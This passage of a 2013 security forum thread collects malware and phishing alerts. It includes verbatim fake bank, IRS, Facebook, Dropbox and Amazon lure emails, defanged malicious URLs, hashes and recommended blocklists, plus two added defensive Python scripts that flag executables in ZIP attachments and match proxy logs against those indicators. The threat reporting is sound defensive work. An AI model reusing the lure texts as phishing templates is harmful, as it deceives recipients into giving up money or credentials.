25 Sep 2013 - "Here are a couple of IPs serving exploit kits.. the case in question is a legitimate site that loads code from 6rf .net and this in turn loads an exploit kit from [donotclick]yandex.ru.sgtfnregsnet.ru and [donotclick]l451l.witnessvacant .biz. The .biz domain in this case is hosted on 198.50.225.121 (OVH, Canada) along with subdomains... That IP hosts various exploit kits* and is suballocated to a Russian customer... Those domains are also associated with some other OVH IPs of 178.33.208.211 and 46.105.166.99 (OVH, France). In both those cases, the OVH range is delegated to another Russian customer... But that's not the only infection that 6rf .net is punting, as there is another malicious domain of [donotclick]yandex .ru.sgtfnregsnet .ru in use (report here**) hosted on 85.25.108.10 (Intergenia AG, Germany). There appears to be at least one other malicious domain on the same server (googlebot .ru ***) which is also serving up an exploit kit... It looks like other malware sites have been hosted on that IP in the past, so I would recommend blocking that too, giving this recommended blocklist:
46.105.166.99
85.25.108.10
178.33.208.211
198.50.225.121
6rf .net ..."
(More listed at the dynamoo URL above.)
* http://urlquery.net/search.php?q=198.50.225.121&type=string&start=2013-09-10&end=2013-09-25&max=50

** http://urlquery.net/report.php?id=5939386

*** http://urlquery.net/report.php?id=5924098

:mad: :fear:

AplusWebMaster
2013-09-26, 15:39
FYI...

Something evil on 91.231.98.149 and boats .net
- http://blog.dynamoo.com/2013/09/something-evil-on-9123198149-and.html
26 Sep 2013 - "This injection attack* on boats .net caught my attention, a nasty bit of injected code pointing to a (now suspended) domain called gamelikeboards .biz hosted on 91.231.98.149 (Neohost.net, Ukraine). Basically, the victim website has code injected pointing to [donotclick]gamelikeboards .biz/_cp/crone/ which cannot be anything good. What do we know about gamelikeboards.biz? As luck would have it, the domain was suspended by the registrar... A look at 91.231.98.0/24 indicates a mix of spammy sites plus a number of local Russian and Ukrainian sites... I don't know what the payload is, but the IP address was also used in this recent malware attack**. The IP and domains are definitely malicious, and I would recommend the following blocklist:
91.231.98.149
eschewsramping .biz
gamelikeboards .biz
sixteenups .biz
sorelyzipmagics .biz
technicaltutoring .biz
zarazagorakakaxx1 .org
zarazagorakakaxx2 .com
* http://urlquery.net/report.php?id=5960880

** https://malwr.com/analysis/YjQ1ZmIyNDYyMzQ1NDdiYjliODBhZTU2NDU2NDgzNmE/

Added: it looks like this site has been compromised before*** ..."
*** http://news.softpedia.com/news/Outdoor-Network-Starts-Notifying-Customers-After-Boats-net-and-Partzilla-com-Hack-382161.shtml
___

Print A Tree, Pop An Ad
- http://www.threattracksecurity.com/it-blog/print-tree-pop-ad/
Sep 26, 2013 - "... We first noticed this one as part of a larger Installcore bundler from a pop up on a “free video” site:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint5.png
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint6.jpg
Quite what our chosen subject matter has to do with videos I’ve no real idea, but never let relevance detract from an Adware bundle. Here it is during the main install of “FLV Player Setup”, and it is called “Print-A-Tree”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/treeprint2.jpg
... Some of the other programs installed from the Installcore bundle included Web Connect (Yontoo variant), Bonanza Deals and O-to-Lyrics... This is where things go horribly wrong, because not only do you have ads injected onto numerous websites, you also end up with pop-ups which often lead to additional installs (with additional Adware!)... The pop-up ad promotes a web browser which will offer up more adware at install, to sit alongside whatever applications you happen to have on board from the first bundle... You can see more about the original bundler file over at VirusTotal*, which currently has it pegged at 8/41..."
* https://www.virustotal.com/en/file/4183c49f0a97ebbec42ea3c928e36624674704f4d4a2566d7c40c22a9a17055f/analysis/1380126410/
File name: FlvPlayerSetup.exe_
Detection ratio: 8/41 ...
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Xerox Scan Attachment Email Messages - 2013 Sep 26
Fake Package Delivery Invoice Notification Email Messages - 2013 Sep 26
Fake Account Payment Notification Email Messages - 2013 Sep 26
Fake Package Delivery Failure Notification Email Messages - 2013 Sep 26
Fake Sales Receipt Notification Email Messages - 2013 Sep 26
Fake Product Order Email Messages - 2013 Sep 26
Fake Voice Messages Delivery Email Messages - 2013 Sep 26
Fake Electronic Payment Cancellation Email Messages - 2013 Sep 26
Fake Purchase Order Request Email Messages - 2013 Sep 26
Fake Product Requirements List Email Messages - 2013 Sep 26
Fake Product Sample Request Email Messages - 2013 Sep 26
Blank Email Messages with Malicious Attachments - 2013 Sep 26
Fake Financial Document Delivery Email Messages - 2013 Sep 26
(More detail and links at the cisco URL above.)

:mad::mad:

AplusWebMaster
2013-09-27, 20:13
FYI...

Fake Facebook SPAM / directgrid .org
- http://blog.dynamoo.com/2013/09/facebook-you-have-new-notifications.html
27 Sep 2013 - "This fake Facebook spam leads to malware on directgrid .org:
Date: Fri, 27 Sep 2013 16:22:58 +0300 [09:22:58 EDT]
From: Facebook [notification+W85BNFWX @facebookmail .com]
Subject: You have 21 friend suggestions, 11 friend requests and 14 photo tags
facebook
You have new notifications.
A lot has happened on Facebook since you last logged in. Here are some notifications
you've missed from your friends.
3 messages
11 friend requests
21 friend suggestions
14 photo tags
View Notifications
Go to Facebook ...

Screenshot: https://lh3.ggpht.com/-7H6j4ml6nRk/UkWZHoxgKnI/AAAAAAAACAA/QM-UWgx5SDg/s1600/facebook2.png

The link in the email goes through a legitimate (but hacked) site and then loads one of the following three scripts:
[donotclick]3dbrandscapes .com/starker/manipulator.js
[donotclick]dtwassociates .com/marry/sullies.js
[donotclick]repairtouch .co .za/lollypops/aquariuses.js
This leads to a malware landing page hosted on a -hijacked- GoDaddy domain at [donotclick]directgrid .org/topic/lairtg-nilles-slliks.php hosted on 50.116.10.71 (Linode, US) where there are a number of other hijacked domains...
Recommended blocklist:
50.116.10.71 ..."
(More listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/50.116.10.71/information/

:fear::mad:

AplusWebMaster
2013-09-30, 18:55
FYI...

Fake IRS SPAM / oooole .org
- http://blog.dynamoo.com/2013/09/irs-invalid-file-email-reminder-spam.html
30 Sep 2013 - "This fake IRS spam leads to malware on oooole .org:
Date: Mon, 30 Sep 2013 03:44:12 -0800 [07:44:12 EDT]
From: "Fire@irs.gov" [burbleoe9@ irs .org]
Subject: Invalid File Email Reminder
9/30/2013
Valued Transmitter,
We few weeks agoreceived your electronic file(s) of information returns; but, the file(s) contained errors. As of the date of this email, we have not received a good replacement file. If we do not receive the replacement file within the allowed time from your transmission, late filing payoff may be applied. For further clarification on sending a timely filed replacement, please see Publication 1220, Part B, Section 7.03. The following is a list of your incorrect file(s) that need to be replaced:
Filename # of Times
Email Has
Been Sent Tax
Year
ORIG.62U55.2845 2 2012...

The link in the email goes through a legitimate -hacked- site and then -redirects- through one of the following three scripts:
[donotclick]savingourdogs .com/boneheads/meditatively.js
[donotclick]solaropti.manclinux3.ukdns .biz/resonators/sunbonnet.js
[donotclick]polamedia .se/augusts/fraudulence.js
The next step is a malware landing page on a hijacked GoDaddy domain at [donotclick]oooole .org/topic/latest-blog-news.php hosted on 75.98.172.238 (A2 Hosting, US) along with several other hijacked domains...
Recommended blocklist:
75.98.172.238 ..."

- https://www.virustotal.com/en/ip-address/75.98.172.238/information/
___

Fake Wells Fargo SPAM - malicious ZIP file
- http://blog.dynamoo.com/2013/09/wells-fargo-important-documents-spam.html
30 Sep 2013 - "This fake Wells Fargo spam comes with a malicious attachment:
Date: Mon, 30 Sep 2013 11:54:15 -0600 [13:54:15 EDT]
From: Bryon Faulkner [Bryon.Faulkner@ wellsfargo .com]
Subject: Important Documents
Please review attached documents.
Bryon Faulkner
Wells Fargo Advisors
817-527-6769 office
817-380-3921 cell Bryon.Faulkner@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

The attached document's name starts with "Documents_" and then has the first part of the recipient's email address as part of the filename. Or that's the way it is meant to work because in practice it will probably be a different recipient in the same domain. Inside is an executable file with the date encoded into the filename (in this case Documents_09302013.exe). The executable file is (obviously) malware, and has a VirusTotal detection rate of just 3/48*... attempted connection to the site demandtosupply .com on 84.22.177.37 (ioMart, UK) which is a server spotted in a similar attack a few weeks ago**. Unfortunately, where more than one domain on a server is compromised then it looks like the bad guys have complete control of the server and can do what they like. There are a number of legitimate sites (including one IT security company) on this box... so exercise caution if deciding to block them.
Recommended blocklist:
84.22.177.37
demandtosupply .com
ce-cloud .com"
* https://www.virustotal.com/en/file/32845402bb571205b36923c74f3c67ea68ca30efe2ceead4118183437b4845da/analysis/1380564661/

** http://blog.dynamoo.com/2013/09/scanned-document-attached-spam.html

- https://www.virustotal.com/en/ip-address/84.22.177.37/information/

:fear: :mad:
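Three of the posts above (the Wells Fargo wire transfer spam, the Intuit invoice spam and the Wells Fargo "Important Documents" spam) carry the same construction, an EXE inside a ZIP attachment, and the first of them recommends blocking EXE-in-ZIP at the perimeter. The following is an added example, not code from dynamoo or from any mail filter; it shows one way to implement that check with the Python standard library: open each ZIP attachment in memory, flag members by executable extension or by the `MZ` header (so an executable renamed to `photo.jpg` is still caught), and recurse into nested ZIPs. The test message, its filenames and the attachment bytes are constructed for the example and contain no real malware.

```python
import email
import email.policy
import io
import os
import zipfile
from email.message import EmailMessage

# File types a perimeter filter would refuse inside an archive. Illustrative
# set; tune it to what your organisation legitimately exchanges.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".js", ".vbs", ".jar", ".msi", ".dll", ".cpl"}
PE_MAGIC = b"MZ"   # DOS/PE header; catches executables renamed to .jpg etc.


def find_executables_in_zip(data, depth=0, max_depth=2):
    """Return member names that look executable, recursing into nested ZIPs."""
    flagged = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return flagged
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = os.path.splitext(info.filename)[1].lower()
            try:
                head = zf.open(info).read(2)
            except RuntimeError:        # password-protected member: cannot sniff the header
                head = b""
            if ext in EXECUTABLE_EXTENSIONS or head == PE_MAGIC:
                flagged.append(info.filename)
            elif ext == ".zip" and depth < max_depth:
                for inner in find_executables_in_zip(zf.read(info), depth + 1, max_depth):
                    flagged.append(info.filename + "!" + inner)
    return flagged


def scan_message(raw_bytes):
    """Return [(attachment filename, [flagged members])] for every ZIP attachment
    that carries an executable. An empty list means the mail passes this check."""
    msg = email.message_from_bytes(raw_bytes, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        if name.lower().endswith(".zip") or payload[:2] == b"PK":
            hits = find_executables_in_zip(payload)
            if hits:
                findings.append((name, hits))
    return findings


def build_sample_message():
    """Constructed test mail modelled on the 'Important Documents' sample above;
    the attachment bytes are dummies, not real malware."""
    bad = io.BytesIO()
    with zipfile.ZipFile(bad, "w") as zf:
        zf.writestr("Documents_09302013.exe", PE_MAGIC + b"\0" * 62)
        zf.writestr("photo.jpg", PE_MAGIC + b"\0" * 62)   # executable hiding behind an image name
    good = io.BytesIO()
    with zipfile.ZipFile(good, "w") as zf:
        zf.writestr("statement.pdf", b"%PDF-1.4\n%%EOF\n")

    msg = EmailMessage()
    msg["From"] = "Bryon Faulkner <sender@example.invalid>"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Important Documents"
    msg.set_content("Please review attached documents.")
    msg.add_attachment(bad.getvalue(), maintype="application", subtype="zip",
                       filename="Documents_recipient.zip")
    msg.add_attachment(good.getvalue(), maintype="application", subtype="zip",
                       filename="statement.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, members in scan_message(build_sample_message()):
        print("REJECT %s: executable content %s" % (name, ", ".join(members)))
```

The header sniff matters more than the extension list: the DivX post earlier in this thread describes executables offered up under gif, jpeg and tif names, and an extension-only rule would pass those. Password-protected archives cannot be inspected at all, so a real filter would normally quarantine those outright rather than fall back to the extension check as this example does.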

AplusWebMaster
2013-10-01, 18:42
FYI...

Fake AMEX phish ...
- http://threattrack.tumblr.com/post/62810863752/american-express-credentials-phish
Oct 1, 2013 - "Subjects Seen:
Fraud Alert : Irregular Card Activity
Typical e-mail details:
Dear Customer,
We detected irregular card activity on your American Express
Check Card on 1st October, 2013.
As the Primary Contact, you must verify your account activity before you can
continue using your card, and upon verification, we will remove any restrictions
placed on your account.
To review your account as soon as possible please.
Please click on the link below to verify your information with us:
americanexpress.com
If you account information is not updated within 24 hours then your ability
to access your account will be restricted.
We appreciate your prompt attention to this important matter.

Malicious URLs
kaindustries.comcastbiz .net/boulevards/index.html
theswordcoast.awardspace .com/catalepsy/index.html
i37raceway .com/hovers/index.html
pizzapluswindsor .ca/americanexpress/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f9f15d03e1e7ddf46f7964a8469f9f67/tumblr_inline_mtzvalp01I1r6pupn.png
___

Fake NACHA SPAM - malware on thewalletslip .com
- http://blog.dynamoo.com/2013/10/fake-nacha-spam-leads-to-malware-on.html
1 Oct 2013 - "This fake NACHA spam leads to malware on thewalletslip .com:
Date: Tue, 1 Oct 2013 15:05:56 +0330 [07:35:56 EDT]
From: ACH Network [markdownfyye396@ nacha .org]
Subject: Your ACH transfer
The ACH processing (ID: 428858072307), recently was made from your bank account (by you or any other person), was rejected by the other financial institution.
Aborted transfer
ACH transfer ID: 428858072307
Reason of Cancellation Notice information in the report below
Transaction Report View Report 428858072307
About NACHA ...

Screenshot: https://lh3.ggpht.com/-Fs6-J6CBRpE/UkrNz0uc4JI/AAAAAAAACAY/0P9Qc8C6gK0/s1600/nacha.png

The link in the email goes through a legitimate -hacked- site and then runs one of three scripts:
[donotclick]theodoxos .gr/hairstyles/defiling.js
[donotclick]web29.webbox11.server-home .org/volleyballs/cloture.js
[donotclick]www.knopflos-combo .de/subdued/opposition.js
Then the victim is directed to a malware landing page at [donotclick]thewalletslip .com/topic/latest-blog-news.php and if you follow this blog regularly then you will not be at all surprised to find that it has been hijacked from GoDaddy... It is hosted on 75.98.172.238 (A2 Hosting, US) which is the same server spotted yesterday*."
Recommended blocklist:
75.98.172.238 ..."
* http://blog.dynamoo.com/2013/09/irs-invalid-file-email-reminder-spam.html

- https://www.virustotal.com/en/ip-address/75.98.172.238/information/
___

Apple spikes as Phishing Target
- http://blog.trendmicro.com/trendlabs-security-intelligence/apple-spikes-as-phishing-target/
Oct 1, 2013 - "... Apple is now the most valuable brand in the world. One party that would agree: cybercriminals, who are now targeting Cupertino in increasing numbers. Earlier in the year, the number of identified Apple phishing sites would only be in the hundreds per month, as seen in the chart below:
Number of identified Apple-related phishing sites
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-graph.png
Some cases of these Apple-related threats just use Apple as social engineering bait. For example, here, the need to “verify” one’s Apple products or services is used to phish email services:
Phishing site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-phish-2.gif
... Apple ID itself is now being targeted for theft. For users of all Apple products – whether they be Macs, iOS devices, or just the iTunes store – the Apple ID is a key ingredient in how they use these products. For example, it can be used to control the data stored in your iCloud account, make purchases of both music and apps, and even manage your iOS or Mac device. Not only that, users from all over the world are being targeted. For example, this phishing site is in French:
Apple ID phishing site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/apple-phish-france-4.gif
... It would appear that cybercriminals are using Apple-related rumors as a gauge of potential interest from users/victims and increase the number of their attacks as needed. This growth in Apple-related threats highlights how Apple users, far from being safe, are continuously targeted by threats today as well..."
___

Pinterest Facebook Friend Spam
- http://threattrack.tumblr.com/post/62823818697/pinterest-facebook-friend-spam
Oct 1, 2013 - "Subjects Seen:
Your Facebook friend <removed> joined Pinterest
Typical e-mail details:
Your Facebook friend <removed> just joined Pinterest. Help welcome <removed> to the community!

Malicious URLs
ats.webd .pl/caskets/index.html
theodoxos .gr/hairstyles/defiling.js
web29.webbox11.server-home .org/volleyballs/cloture.js
knopflos-combo .de/subdued/opposition.js
pizzapluswindsor .ca/topic/latest-blog-news.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bf61cd5a0995ac279cf8940470bf8ae5/tumblr_inline_mu050u7D5p1r6pupn.png
___

Tens of thousands of fake Twitter accounts passed off and sold as 'followers'
- https://www.virusbtn.com/blog/2013/09_20.xml
20 Sep 2013
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Attachments - 2013 Oct 01
Fake Commissions Statement Notification Email Messages - 2013 Oct 01
Fake Product Order Request Email Messages - 2013 Oct 01
Fake Purchase Order Notification Email Messages - 2013 Oct 01
Fake Product Order Delivery Information Email Messages - 2013 Oct 01
Fake Multimedia Message Delivery Email Message - 2013 Oct 01
Fake Product Order Email Messages - 2013 Oct 01
Fake Bank Payment Notification Email Messages - 2013 Oct 01
Fake Court Document Email Messages - 2013 Oct 01
Fake Document Filing Notification Email Messages - 2013 Oct 01
Fake Debt Collection Notification Email Messages - 2013 Oct 01
Fake Account Payment Notification Email Messages - 2013 Oct 01
Fake Product Purchase Order Email Messages - 2013 Oct 01
Fake Product Specification Request Email Messages - 2013 Oct 01
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 01
Fake Shipment Invoice Email Messages - 2013 Oct 01
Fake Payment Information Email Messages - 2013 Oct 01
Blank Email Messages with Malicious Attachments - 2013 Oct 01
(More detail and links at the cisco URL above.)

:fear::mad::fear:

AplusWebMaster
2013-10-02, 14:24
FYI...

Fake T-Mobile message emails lead to malware
- http://www.webroot.com/blog/2013/10/02/t-mobile-mms-message-arrived-themed-emails-lead-malware/
Oct 2, 2013 - "A circulating malicious spam campaign attempts to trick T-Mobile customers into thinking that they’ve received a password-protected MMS. However, once gullible and socially engineered users execute the malicious attachment, they automatically compromise the confidentiality and integrity of their PCs, allowing the cybercriminals behind the campaign to gain complete control of their PCs. Detection rate for the spamvertised sample – MD5: 5d69a364ffa8d641237baf4ec7bd641f – * W32/Trojan.XTWU-6193; TR/Sharik.B; Trojan.DownLoader9.22851
Once executed, the sample phones back to networksecurityx.hopto .org – 69.65.19.117 ... subdomains are also known to have phoned back to the same IP in the past... malicious MD5s are also known to have phoned back to the same domain/IP in the past..."
* https://www.virustotal.com/en/file/a9e3c6ff238cd1e4a5a2d3312bfad59091c25698e6c072623af279a58ebbe254/analysis/1379599644/
___

Fake Facebook Mobile Page Steals Credit Card Details
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-mobile-page-steals-credit-card-details/
Oct 1, 2013 10:28 pm (UTC-7) - "... a mobile phishing page that looks very similar to the official Facebook mobile page. However, looking closely into the URL address, there are noticeable differences. The real Facebook page is located at https://m.facebook.com/login and has the lock icon to show that the page is secured.
Fake vs. legitimate Facebook mobile page
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Facebook-phishingvsreal-pag.gif
This page tries to steal more than Facebook credentials. Should users actually try to log in, the page then prompts users to choose a security question. This may sound harmless, but these same security questions might be used across several different sites, and can compromise your security as well.
Fake Facebook security page
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/fake-facebook-security-page.gif
Once users are done, they are led to another page, this time asking for their credit card details.
Page asking for credit card details
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/fake-facebook-page-creditca.gif
In cases like these, users should always be careful and double-check the URLs of sites they are entering personal information into, particularly those that claim to belong to a particular service. In addition, Facebook does -not- ask for a user’s credit card information unless they are making a purchase..."
___

"microsoft support" calls - now with ransomware
- https://isc.sans.edu/diary.html?storyid=16703
Last Updated: 2013-10-02 04:16:32 UTC - "Most of us are familiar with the "microsoft support" call. A phone call is received, the person states they are from "microsoft support" and they have been alerted that your machine is infected. The person will assist you by having you install a remote desktop tool such as teamviewer or similar (we have seen many different versions). Previously they would install software that would bug you until you paid the "subscription fee". As the father of a friend found out the other day when he received a call, they now install -ransomware- which will lock the person out of their computer until a fee has been paid. In this instance it was done quite early in the "support" call, so even disconnecting when smelling a rat it was too late. The ransomware itself looks like it replaced some start up parameters to kick in the lockout rather than encrypting the drive or key elements of the machine. However for most users that would be enough to deny access. So in the spirit of Cyber Security Awareness Month make this month one where you let your non-IT friends and family know two things. Firstly, BACKUP YOUR STUFF. Secondly, tell them "when you receive a call from "microsoft support", the correct response is to hang up."
___

Fake Staples SPAM leads to malware on tootle .us
- http://blog.dynamoo.com/2013/10/fake-staples-spam-leads-to-malware-on.html
2 Oct 2013 - "This fake Staples spam leads to malware on a site called tootle .us:
Date: Wed, 2 Oct 2013 08:40:11 -0500 [09:40:11 EDT]
From: support@ orders.staples .com
Subject: Staples order #: 1353083565
Thank you for shopping Staples.
Here's what happens next:
Order No.:1353083565
Customer No.:1278823232 Method of Payment:Credit or Debit Card
Track order: Track your order
Delivery Address:
Caleb Lewis
41 COMMERCE ST
GREENFIELD WA 092980135
Item1 Qty. Subtotal
DELL 1320 BLACK TONER
Item No.:744319Price:$60.38/each
Expected delivery:10/4/2013byUPS 2 $125.26
Item2 Qty. Subtotal
DELL RY854 CYAN TONER
Item No.:717860Price:$61.87/each
Expected delivery:10/4/2013byUPS 2 $124.03
Subtotal:: $243.59
Delivery: FREE
Tax: $17.66
Total: $250.35
Your order is subject to review ...

Screenshot: https://lh3.ggpht.com/-q6p692ui0yA/UkwxpO-DKdI/AAAAAAAACBA/jtONVL3tAfI/s1600/staples.png

The link in the email goes to a legitimate (but hacked) site and then attempts to load one of the following three scripts:
[donotclick]algmediation .org/inventory/symphony.js
[donotclick]apptechgroups .net/katharine/bluejacket.js
[donotclick]ctwebdesignshop .com/marquetry/bucket.js
From there the victim is redirected to a malware landing page at [donotclick]tootle .us/topic/latest-blog-news.php hosted on 23.92.22.75 (Linode, US) which is yet another -hijacked- GoDaddy domain (there are some more on this server...)..."
Recommended blocklist:
23.92.22.75
tootle .us ..."

- https://www.virustotal.com/en/ip-address/23.92.22.75/information/

:fear::mad:

AplusWebMaster
2013-10-03, 19:57
FYI...

Fake Amazon SPAM - uses email address harvested from Comparethemarket .com
- http://blog.dynamoo.com/2013/10/fake-amazon-spam-uses-email-address.html
3 Oct 2013 - "This fake Amazon spam was sent to an email address only used for the UK price comparison site Comparethemarket .com.
From: Amazon.com [ship-confirm@ amazon .com]
Reply-To: "Amazon.com" [ship-confirm@ amazon .com]
Date: 3 October 2013 15:43
Subject: Your Amazon.com order of "Canon EOS 60D DSLR..." has shipped!
Amazon .com
Kindle Store
| Your Account | Amazon.com
Order Confirmation
Order #159-2060285-0376154 ...

Screenshot: https://lh3.ggpht.com/-c8R7xg-gpdY/Uk2X8G-KMAI/AAAAAAAACB4/RIr-Fimvkxs/s1600/amazon.png

How the email address was extracted from Comparethemarket.com is not known. The link in the email goes through a legitimate hacked site and then runs one of the following three scripts:
[donotclick]berkahabadi .de/unclear/unsettle.js
[donotclick]sigmarho.zxq .net/ragas/sextant.js
[donotclick]wni9e7311.homepage.t-online .de/creel/eccentrically.js
This redirects the victim to a malware page at [donotclick]globalrealty-nyc .info/topic/latest-blog-news.php which is a hijacked GoDaddy domain hosted on 96.126.103.252 (Linode, US). This is currently the only domain that I can detect on this computer, but the usual pattern is that there will be several others so blocking that IP address would be prudent.
Recommended blocklist:
96.126.103.252 ..."

- https://www.virustotal.com/en/ip-address/96.126.103.252/information/

USPS Express Services Spam
- http://threattrack.tumblr.com/post/62995873638/usps-express-services-spam
Oct 3, 2013 - "Subjects Seen:
USPS - Your package is available for pickup ( Parcel <random> )
USPS - Missed package delivery
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
Label: <random>
Print this label to get this package at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
USPS Logistics Services.

Malicious File Name and MD5:
USPS_Label_<random>.zip (43BA7C2530EF2F69DEF845FE5E10C6C7)
USPS_Label_<date>.exe (7EAC25BFC4781CA44C5D991115AAF0B4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9b894dabc36a9a3ca56b389f8998f4e3/tumblr_inline_mu3kgsMMFH1r6pupn.png

:fear: :mad:

AplusWebMaster
2013-10-04, 17:19
FYI...

Fake Dropbox SPAM - leads to malware on adelect .com
- http://blog.dynamoo.com/2013/10/fake-dropbox-spam-leads-to-malware-on.html
4 Oct 2013 - "This fake Dropbox spam leads to malware:
Date: Fri, 4 Oct 2013 16:24:30 +0330 [08:54:30 EDT]
From: Dropbox [no-reply@ dropboxmail .com]
Subject: Please update your Expired Dropbox Password
Hi [redacted].
We noticed that you recently tried to login in to Dropbox with a password that you haven't changed more than 90 days. Your old password has expired and you'll need to create a new one to log in.
Please visit the page to update your password
Reset Password
Thanks!
- The Dropbox Team

Screenshot: https://lh3.ggpht.com/-8446bMdKtno/Uk6__aJc2AI/AAAAAAAACCM/mnPJHVUoqbE/s1600/dropbox.png

The link in the email goes through a legitimate hacked site and then on to a set of three scripts:
[donotclick]12.158.190.75 /molls/smudgier.js
[donotclick]freetraffic2yourweb .com/palermo/uneconomic.js
[donotclick]www.bathroomchoice .com/huntsmen/bestsellers.js
From there the victim is delivered to a malware landing page at [donotclick]adelect .com/topic/latest-blog-news.php which follows a predictable pattern of being a hijacked GoDaddy domain hosted on 66.150.155.210 (Nuclear Fallout Enterprises, US). There are some other hijacked domains on this same server..."
Recommended blocklist:
66.150.155.210
wrightleasing .com
renewalbyandersendayton .com
adelect .com
12.158.190.75
freetraffic2yourweb .com
www .bathroomchoice .com"

- https://www.virustotal.com/en/ip-address/66.150.155.210/information/

:fear: :mad:
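The NACHA, Staples, Amazon and Dropbox posts above all describe the same chain: a link through a hacked legitimate site, one of three .js redirectors, then a landing page at /topic/latest-blog-news.php on a hijacked domain. As an added example (not code from any of the blogs quoted here), this Python script refangs the posts' recommended blocklists and checks proxy-log lines against both the listed hosts/IPs and that shared landing path; the log format, timestamps and client IPs are constructed assumptions.

```python
"""Check proxy-log URLs against the defanged blocklists quoted in the posts above.

Added example; the log format, client IPs and timestamps are constructed.
"""
import re
from urllib.parse import urlsplit

# "Recommended blocklist" entries exactly as the dynamoo posts print them,
# defanged with a space before each dot; IPs are left as-is.
DEFANGED_BLOCKLIST = [
    "75.98.172.238",                       # fake NACHA landing server
    "23.92.22.75", "tootle .us",           # fake Staples
    "96.126.103.252",                      # fake Amazon
    "66.150.155.210", "wrightleasing .com", "renewalbyandersendayton .com",
    "adelect .com", "12.158.190.75", "freetraffic2yourweb .com",
    "www .bathroomchoice .com",            # fake Dropbox
]

# Landing-page path shared by every campaign in these posts.
LANDING_PATH = "/topic/latest-blog-news.php"

# Constructed log format (an assumption, not a real product's format):
# "<timestamp> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def refang(indicator):
    """Turn a defanged entry such as 'www .bathroomchoice .com' back into a hostname."""
    return re.sub(r"\s*\.\s*", ".", indicator.strip()).lower()


def build_blocklist(entries):
    """Normalised set of hosts and IPs to match against."""
    return {refang(e) for e in entries}


def check_request(url, blocklist):
    """Return the reasons (possibly none) a requested URL matches the indicators."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # Match both the 'www.' and bare forms of a listed host.
    candidates = {host}
    if host.startswith("www."):
        candidates.add(host[4:])
    reasons = []
    matched = sorted(candidates & blocklist)
    if matched:
        reasons.append("host on blocklist: " + matched[0])
    # The shared landing path also catches hijacked domains not yet on any list;
    # dynamoo notes they usually sit on the same server as the listed one.
    if parts.path.lower() == LANDING_PATH:
        reasons.append("known malware landing path")
    return reasons


def scan_proxy_log(lines, blocklist):
    """Return one hit per log line that matches the blocklist or landing path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:          # skip malformed or blank lines
            continue
        ts, client, _method, url, _status = m.groups()
        reasons = check_request(url, blocklist)
        if reasons:
            hits.append({"time": ts, "client": client, "url": url, "reasons": reasons})
    return hits


# Constructed sample log; client IPs and timestamps are made up.
SAMPLE_LOG = [
    "2013-10-04T12:00:01Z 10.0.0.5 GET http://example.com/index.html 200",
    "2013-10-04T12:00:02Z 10.0.0.5 GET http://www.bathroomchoice.com/huntsmen/bestsellers.js 200",
    "2013-10-04T12:00:03Z 10.0.0.5 GET http://adelect.com/topic/latest-blog-news.php 200",
    "2013-10-04T12:00:04Z 10.0.0.7 GET http://66.150.155.210/topic/latest-blog-news.php 404",
    "2013-10-04T12:00:05Z 10.0.0.9 GET http://unlisted-hijacked.example/topic/latest-blog-news.php 200",
    "not a log line",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG, build_blocklist(DEFANGED_BLOCKLIST)):
        print(hit["time"], hit["client"], hit["url"], "; ".join(hit["reasons"]))
```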

AplusWebMaster
2013-10-07, 22:21
FYI...

Fake National Bankruptcy Services SPAM
- http://threattrack.tumblr.com/post/63378601795/national-bankruptcy-services-spam
Oct 7, 2013 - "Subjects Seen:
6253-9166
Typical e-mail details:
Please see the attached Iolta report for 6253-9166.
We received a check request in the amount of $19,335.05 for the above referenced file. However, the attached report reflects a $0 balance. At your earliest convenience, please advise how this request is to be funded.
Thanks.
Milton_Forrest *
Accounts Payable
National Bankruptcy Services, LLC

Malicious File Name and MD5:
6253-9166.zip (47E464919165F040B03160BAA38FD5E3)
report_<date>.exe (0798687A993B98EBF5E87A6F78311F32)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/de9cee914246610c515325efaea015fa/tumblr_inline_mub2myCgf21r6pupn.png
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Account Complaint Resolution Document Email Messages - 2013 Oct 07
